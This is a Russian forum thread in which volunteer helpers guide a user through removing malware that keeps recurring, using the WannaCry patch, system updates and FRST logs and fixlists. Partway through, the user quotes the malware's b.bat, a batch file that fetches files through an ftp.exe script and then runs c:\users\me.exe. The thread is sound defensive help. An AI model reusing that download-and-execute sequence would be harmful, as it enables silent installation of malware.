Burunduchok 0 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Все началось с двух синих экранов за день,я сразу решил посмотреть дампы. На скринах все видно. Вчера сделал логи,если надо могу сделать сегодняшние. Как видите по скринам в карантине одни и те же файлы вируса,он после каждой перезагрузки их находит снова и снова,и их становится больше. Так же была создана учетная запись гость под паролем,я ее удаляю,ну после перезагрузки появляется снова. Есть подозрения на файловый вирус,которые сложно лечить. CollectionLog-2017.06.03-23.17.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Все обновления для системы и патч против WannaCry установлены? Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Все обновления для системы и патч против WannaCry установлены? Для системы не знаю,ну патч я не знаю откуда установить. Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Читаем первое сообщение https://forum.kasperskyclub.ru/index.php?showtopic=55543 Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Читаем первое сообщение https://forum.kasperskyclub.ru/index.php?showtopic=55543 Сейчас установится. Что по логам и по скринам скажете? Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Что по логам и по скринам скажете? из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно. Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Что по логам и по скринам скажете?из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно. Счас так и сделаем Все обновления для системы и патч против WannaCry установлены? из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно. Поставил патч отдельно,потом обновления все поставил (см.скриншот). В мой компьютер висят до сих пор 4 диска. Логи новые сделал. CollectionLog-2017.06.04-14.27.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Сделано Logs.rar Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Содержимое файла C:\Windows\system32\b.bat процитируйте. 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: 2017-06-04 01:15 - 2017-06-04 13:48 - 00000000 ___HD C:\Users\Все пользователи\vrytwvhkhl424 2017-06-04 01:15 - 2017-06-04 13:48 - 00000000 ___HD C:\ProgramData\vrytwvhkhl424 Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание, что будет выполнена перезагрузка компьютера. Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Содержимое файла C:\Windows\system32\b.bat процитируйте. b.bat: ftp.exe -s:a.tmp ping -n 15 127.0.0.1 del a.tmp c:\users\me.exe Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 c:\users\me.exe есть на компьютере? Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 c:\users\me.exe есть на компьютере? Вроде через поиск ничего такого не нашел. Папку с Frst удалю,а то там в карантине как раз файлы это вируса Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Проблема решена? Цитата Ссылка на сообщение Поделиться на другие сайты
Burunduchok 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Проблема решена? В принципе решена. Тему можно закрывать. Ноутбук может быть заражен,я с него файлы передавал,когда заражен компьютер был? Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.